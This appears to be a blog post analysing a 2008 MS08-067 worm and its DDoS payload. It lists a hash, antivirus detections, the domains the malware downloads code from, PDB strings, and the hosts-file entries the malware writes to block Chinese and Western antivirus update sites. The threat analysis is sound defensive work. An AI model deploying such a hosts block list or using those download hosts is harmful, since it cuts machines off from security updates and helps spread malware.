The first report that we received was that ThreatExpert had identified the new worm. Their post was the first place we found an MD5 of the new malware, which was listed as MD5 = AE4251541EBEA00014D3DABC90118279.

We used the article to check VirusTotal to see who was already detecting this one, and got the following results back:

AntiVir - - TR/Expl.MS08-067.G
BitDefender - - Trojan.Downloader.Shelcod.A
F-Secure - - Exploit.Win32.MS08-067.g
GData - - Trojan.Downloader.Shelcod.A
Ikarus - - Virus.Exploit.Win32.MS08.067.g
K7AntiVirus - - Exploit.Win32.MS08-067.g
Kaspersky - - Exploit.Win32.MS08-067.g
Microsoft - - Exploit:Win32/MS08067.gen!A
NOD32 - - Win32/Exploit.MS08-067.B
Prevx1 - - Malicious Software
SecureWeb-Gateway - Trojan.Expl.MS08-067.G
Sophos - - Mal/Generic-A

We know from the ThreatExpert Report that Kaspersky, Microsoft and Sophos were all detecting it BEFORE their report.

Symantec clearly knows about it as well, as Computerworld interviewed their Kevin Haley, who told them Symantec is calling the malware "Wecorl", and that they believe it came out of China. Haley also warns that because infected machines attempt to contact all peers on their subnet via port 139, if a single infected laptop gets into an organization after becoming infected while not behind the corporate firewall, the results could be quite serious.

The Symantec Technical Details are quite thorough, including the names of several websites where the malware attempts to download additional code from. Firewall administrators will want to be on the lookup for traffic to these sites:

* robot.10wrj.com
* ls.cc86.info
* ls.lenovowireless.net
* ls.playswomen.com

The full URLs were not given in the technical article.

When we finally got our hands on the malware, thanks to Packet Ninja's Daniel Uriah Clemens, we were able to conclusively agree with Haley about the Chinese origins. Big hints are revealed in the strings of some of the dropped malware, which includes strings we found on Chinese anti-virus discussion sites, dating back as early as August of this year, discussing code used by a DDOS Botnet. (For example, this page on "HackPro.cn").

In particular, the configuration of the webserver planted on the boxes defaults to Chinese language (Accept-Language: zh-cn), and the list of anti-virus update and forums which should be null routed clearly was built by someone considering Chinese anti-virus tools as the main ones which should be blocked.


This list updates the "hosts" table on the compromised computer, which prevents contact with the various anti-virus sites listed below.
127.0.0.1 www.360Safe.com
127.0.0.1 www.360.cn
127.0.0.1 bbs.360safe.com
127.0.0.1 baike.360.cn
127.0.0.1 kaba.360.cn
127.0.0.1 bbs.360.cn
127.0.0.1 360.cn
127.0.0.1 forum.ikaka.com
127.0.0.1 tool.ikaka.com
127.0.0.1 file.ikaka.com
127.0.0.1 update.ikaka.com
127.0.0.1 bbs.ikaka.com
127.0.0.1 bbs.janmeng.com
127.0.0.1 www.ikaka.com
127.0.0.1 forum.jiangmin.com
127.0.0.1 update.rising.com.cn
127.0.0.1 online.rising.com.cn
127.0.0.1 center.rising.com.cn
127.0.0.1 www.rising.com.cn
127.0.0.1 fw.rising.com.cn
127.0.0.1 csc.rising.com.cn
127.0.0.1 buy.rising.com.cn
127.0.0.1 sos.rising.com.cn
127.0.0.1 download.rising.com.cn
127.0.0.1 help.rising.com.cn
127.0.0.1 go.rising.com.cn
127.0.0.1 up.duba.net
127.0.0.1 bbs.duba.net
127.0.0.1 shadu.baidu.com
127.0.0.1 www.kztechs.com
127.0.0.1 security.symantec.com
127.0.0.1 shadu.duba.net
127.0.0.1 online.jiangmin.com
127.0.0.1 cn.mcafee.com
127.0.0.1 bbs.mcafeefans.com
127.0.0.1 mcafeefans.com
127.0.0.1 www.ahn.com.cn
127.0.0.1 www.kaspersky.com.cn
127.0.0.1 www.kaspersky.com
127.0.0.1 www.pcav.cn
127.0.0.1 www.vrv.com.cn
127.0.0.1 bbs.sucop.com
127.0.0.1 www.sucop.com
127.0.0.1 sucop.com
127.0.0.1 bbs.cpcw.com
127.0.0.1 www.shudoo.com
127.0.0.1 alert.rising.com.cn
127.0.0.1 www.dswlab.com
127.0.0.1 dswlab.com
127.0.0.1 bbs.dswlab.com
127.0.0.1 zhidao.ikaka.com
127.0.0.1 bbs.kafan.cn
127.0.0.1 bbs.kaspersky.com.cn
127.0.0.1 www.trendmicro.com.cn
127.0.0.1 bbs.trendmicro.com.cn
127.0.0.1 cn.trendmicro.com
127.0.0.1 www.kpfans.com
127.0.0.1 kpfans.com
127.0.0.1 www.mcafee.com
127.0.0.1 dnl-cn1.kaspersky-labs.com
127.0.0.1 dnl-cn2.kaspersky-labs.com
127.0.0.1 dnl-cn3.kaspersky-labs.com
127.0.0.1 dnl-cn4.kaspersky-labs.com
127.0.0.1 dnl-cn5.kaspersky-labs.com
127.0.0.1 dnl-cn6.kaspersky-labs.com
127.0.0.1 dnl-cn7.kaspersky-labs.com
127.0.0.1 dnl-cn8.kaspersky-labs.com
127.0.0.1 dnl-cn9.kaspersky-labs.com
127.0.0.1 dnl-cn10.kaspersky-labs.com
127.0.0.1 dnl-cn11.kaspersky-labs.com
127.0.0.1 dnl-cn12.kaspersky-labs.com
127.0.0.1 dnl-cn13.kaspersky-labs.com
127.0.0.1 dnl-cn14.kaspersky-labs.com
127.0.0.1 dnl-cn15.kaspersky-labs.com
(many other Kaspersky sites listed are omitted here).



Knowing that the origins of the virus were probably Chinese, we started looking to our Chinese friends for help understanding the malware.

Here's an October 2, 2008 posting on duba.net that gives samples of the DDOS Configuration Script, and uses the same name for the malware found on the August link above ( vv1dap32.exe ). This is NOT THE WORM, but is rather referring to the DDOS engine which is being loaded by the worm-infected computers.

In that earlier DDOS program, the updated malware was loaded from "ushealthmart.com". That malware is still available (webcc.exe) and still very unlikely to be detected according to Virus Total, who shows only a 6 of 36 detection rate for the earlier worm, which they have seen reported since October 7th.

F-Secure 8.0.14332.0 2008.11.03 Worm:W32/AutoRun.JF
Kaspersky 7.0.0.125 2008.11.03 Worm.Win32.Downloader.wo
NOD32 3579 2008.11.03 Win32/KernelBot.AA
Panda 9.0.0.4 2008.11.03 Suspicious file
Sophos 4.35.0 2008.11.03 Troj/Agent-ICY
Symantec 10 2008.11.03 W32.Kernelbot.A

Some strings found in the current malware may help with identification of an author, or at least an authoring host:

e:\work\supermj\drivers\360antirk\objfre_w2K_x86\i386\360IceBreaker.pdb

d:\Works\KernelBots_Up28\Server\Release\Server.pdb